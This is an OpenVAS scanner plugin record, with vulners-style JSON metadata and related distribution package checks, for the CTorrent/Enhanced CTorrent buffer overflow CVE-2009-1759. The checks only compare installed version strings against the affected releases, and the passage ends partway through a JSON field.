ID OPENVAS:1361412562310900557 Type openvas Reporter Copyright (C) 2009 SecPod Modified 2020-04-27T00:00:00
Description
CTorrent/Enhanced CTorrent is installed on the host and is
prone to a buffer overflow vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability
#
# Authors:
# Nikita MR <rnikita@secpod.com>
#
# Copyright:
# Copyright (C) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Metadata section: runs only when the scanner sets `description`, registers the
# VT's identity, scoring, references and prerequisites, and then leaves via
# exit(0) so none of the check logic after this block is executed in that mode.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900557");
script_version("2020-04-27T09:00:11+0000");
script_tag(name:"last_modification", value:"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)");
script_tag(name:"creation_date", value:"2009-06-01 09:35:57 +0200 (Mon, 01 Jun 2009)");
# CVSS v2 base score and vector for the single CVE this VT covers.
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2009-1759");
script_bugtraq_id(34584);
script_name("CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability");
script_xref(name:"URL", value:"http://secunia.com/advisories/34752");
script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/8470");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/49959");
# The finding is derived from a version string, not from exercising the flaw:
# the check section only compares KB version entries against fixed values.
script_tag(name:"qod_type", value:"executable_version");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 SecPod");
script_family("Buffer overflow");
# Prerequisites: the detection VT must have run and the "Installed" KB key must
# exist (presumably written by secpod_ctorrent_detect.nasl -- confirm there).
script_dependencies("secpod_ctorrent_detect.nasl");
script_mandatory_keys("CTorrent/CTorrent_or_Enhanced/Installed");
script_tag(name:"impact", value:"Attackers can exploit this issue by execute arbitrary code via
specially crafted torrent files and can cause denial of service.");
script_tag(name:"affected", value:"CTorrent version 1.3.4 on Linux.
Enhanced CTorrent version 3.3.2 and prior on Linux.");
script_tag(name:"insight", value:"A stack based buffer overflow is due to a boundary error within
the function 'btFiles::BuildFromMI()' in btfiles.cpp while processing torrent
files containing a long path.");
# NOTE(review): the solution text names no fixed release; the only pointers to
# the fix are the two dtorrent SourceForge xrefs registered below, so whoever
# remediates has to confirm the patch level on the host rather than a version.
script_tag(name:"solution", value:"Apply the appropriate patch.");
script_tag(name:"summary", value:"The host is installed with CTorrent/Enhanced CTorrent and is
prone to a Buffer Overflow Vulnerability.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://sourceforge.net/p/dtorrent/bugs/14/");
script_xref(name:"URL", value:"http://sourceforge.net/p/dtorrent/code/HEAD/tree");
# Stop here in description mode.
exit(0);
}
# Check section: compares the version strings stored in the KB with the affected
# versions and reports the first match. Nothing is sent to the target here.
#
# NOTE(review): the remedy for this issue is a patch, not a new upstream release,
# and both tests below look only at the version string. A patched build that
# still identifies as 1.3.4 / 3.3.2 would presumably be reported as well --
# confirm the patch state on the host before treating a hit as confirmed.
include("version_func.inc");

# Original CTorrent: only the exact version 1.3.4 is flagged.
ctVer = get_kb_item("CTorrent/Ver");
if(ctVer != NULL && version_is_equal(version:ctVer, test_version:"1.3.4"))
{
  ctReport = report_fixed_ver(installed_version:ctVer, vulnerable_range:"Equal to 1.3.4");
  security_message(port:0, data:ctReport);
  exit(0);
}

# Enhanced CTorrent: 3.3.2 and everything below it is flagged. This key is read
# only after the CTorrent test above did not report.
enhVer = get_kb_item("Enhanced/CTorrent/Ver");
if(enhVer != NULL && version_is_less_equal(version:enhVer, test_version:"3.3.2"))
{
  enhReport = report_fixed_ver(installed_version:enhVer, vulnerable_range:"Less than or equal to 3.3.2");
  security_message(port:0, data:enhReport);
  exit(0);
}

# Neither product matched an affected version (or no version was recorded).
exit(99);
{"id": "OPENVAS:1361412562310900557", "type": "openvas", "bulletinFamily": "scanner", "title": "CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability", "description": "The host is installed with CTorrent/Enhanced CTorrent and is\nprone to a Buffer Overflow Vulnerability.", "published": "2009-06-01T00:00:00", "modified": "2020-04-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900557", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/49959", "http://secunia.com/advisories/34752", "http://sourceforge.net/p/dtorrent/bugs/14/", "http://www.milw0rm.com/exploits/8470", "http://sourceforge.net/p/dtorrent/code/HEAD/tree"], "cvelist": ["CVE-2009-1759"], "lastseen": "2020-04-29T22:26:30", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1759"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231064252", "OPENVAS:136141256231064730", "OPENVAS:136141256231064732", "OPENVAS:64252", "OPENVAS:64730", "OPENVAS:900557", "OPENVAS:1361412562310121070", "OPENVAS:64732", "OPENVAS:66158", "OPENVAS:136141256231066158"]}, {"type": "exploitdb", "idList": ["EDB-ID:8470"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1817-1:FA2AD"]}, {"type": "gentoo", "idList": ["GLSA-201311-11"]}, {"type": "nessus", "idList": ["FEDORA_2009-8969.NASL", "FEDORA_2009-8897.NASL", "FREEBSD_PKG_83D7D149B96511DEA5150022156E8794.NASL", "GENTOO_GLSA-201311-11.NASL", "DEBIAN_DSA-1817.NASL"]}, {"type": "freebsd", "idList": ["83D7D149-B965-11DE-A515-0022156E8794"]}, {"type": "fedora", "idList": ["FEDORA:0A79010F877", "FEDORA:4FC6A10F8B4"]}], "modified": "2020-04-29T22:26:30", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2020-04-29T22:26:30", "rev": 2}, "vulnersScore": 8.5}, "pluginID": "1361412562310900557", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n#\n# CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900557\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-06-01 09:35:57 +0200 (Mon, 01 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_name(\"CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34752\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8470\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/49959\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n 
script_dependencies(\"secpod_ctorrent_detect.nasl\");\n script_mandatory_keys(\"CTorrent/CTorrent_or_Enhanced/Installed\");\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue by execute arbitrary code via\nspecially crafted torrent files and can cause denial of service.\");\n script_tag(name:\"affected\", value:\"CTorrent version 1.3.4 on Linux.\nEnhanced CTorrent version 3.3.2 and prior on Linux.\");\n script_tag(name:\"insight\", value:\"A stack based buffer overflow is due to a boundary error within\nthe function 'btFiles::BuildFromMI()' in btfiles.cpp while processing torrent\nfiles containing a long path.\");\n script_tag(name:\"solution\", value:\"Apply the appropriate patch.\");\n script_tag(name:\"summary\", value:\"The host is installed with CTorrent/Enhanced CTorrent and is\nprone to a Buffer Overflow Vulnerability.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://sourceforge.net/p/dtorrent/bugs/14/\");\n script_xref(name:\"URL\", value:\"http://sourceforge.net/p/dtorrent/code/HEAD/tree\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nctorrentVer = get_kb_item(\"CTorrent/Ver\");\nif(ctorrentVer != NULL)\n{\n if(version_is_equal(version:ctorrentVer, test_version:\"1.3.4\"))\n {\n report = report_fixed_ver(installed_version:ctorrentVer, vulnerable_range:\"Equal to 1.3.4\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nectorrentVer = get_kb_item(\"Enhanced/CTorrent/Ver\");\nif(ectorrentVer != NULL)\n{\n if(version_is_less_equal(version:ectorrentVer, test_version:\"3.3.2\")){\n report = report_fixed_ver(installed_version:ectorrentVer, vulnerable_range:\"Less than or equal to 3.3.2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Buffer overflow"}
{"cve": [{"lastseen": "2020-10-03T11:54:13", "description": "Stack-based buffer overflow in the btFiles::BuildFromMI function (trunk/btfiles.cpp) in Enhanced CTorrent (aka dTorrent) 3.3.2 and probably earlier, and CTorrent 1.3.4, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Torrent file containing a long path.", "edition": 3, "cvss3": {}, "published": "2009-05-22T11:52:00", "title": "CVE-2009-1759", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1759"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:rahul:dtorrent:3.2.0", "cpe:/a:rahul:dtorrent:3.3.1", "cpe:/a:rahul:dtorrent:3.3.2", "cpe:/a:rahul:dtorrent:3.3.0", "cpe:/a:rahul:ctorrent:1.3.4"], "id": "CVE-2009-1759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1759", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:rahul:dtorrent:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:dtorrent:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:ctorrent:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:dtorrent:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:dtorrent:3.3.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "Gentoo Linux Local Security Checks GLSA 201311-11", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121070", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121070", 
"type": "openvas", "title": "Gentoo Security Advisory GLSA 201311-11", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201311-11.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121070\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:18 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201311-11\");\n script_tag(name:\"insight\", value:\"CTorrent contains a stack-based buffer overflow in the btFiles::BuildFromMI function in trunk/btfiles.cpp.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201311-11\");\n script_cve_id(\"CVE-2009-1759\");\n 
script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201311-11\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-p2p/ctorrent\", unaffected: make_list(\"ge 3.3.2-r1\"), vulnerable: make_list(\"lt 3.3.2-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:39:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064732", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064732", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8969 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8969.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8969 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-7.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\n- update to 3.3.2 patch\n- improve summary: and description\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8969\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64732\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8969 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64732", "href": "http://plugins.openvas.org/nasl.php?oid=64732", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8969 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8969.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8969 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-7.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\n- update to 3.3.2 patch\n- improve summary: and description\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8969\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.\";\n\n\n\nif(description)\n{\n script_id(64732);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8969 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066158", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066158", "type": "openvas", "title": "FreeBSD Ports: ctorrent", "sourceData": "#\n#VID 83d7d149-b965-11de-a515-0022156e8794\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 83d7d149-b965-11de-a515-0022156e8794\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: ctorrent\n\nCVE-2009-1759\nStack-based buffer overflow in the btFiles::BuildFromMI function\n(trunk/btfiles.cpp) in Enhanced CTorrent (aka dTorrent) 3.3.2 and\nprobably earlier, and CTorrent 1.3.4, allows remote attackers to cause\na denial of service (crash) and possibly execute arbitrary code via a\nTorrent file containing a long path.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://sourceforge.net/tracker/?func=detail&aid=2782875&group_id=202532&atid=981959\nhttp://www.vuxml.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66158\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n 
script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: ctorrent\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ctorrent\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.3.2_2\")<0) {\n txt += 'Package ctorrent version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064730", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064730", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8897 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8897.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8897 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# 
Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-10.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
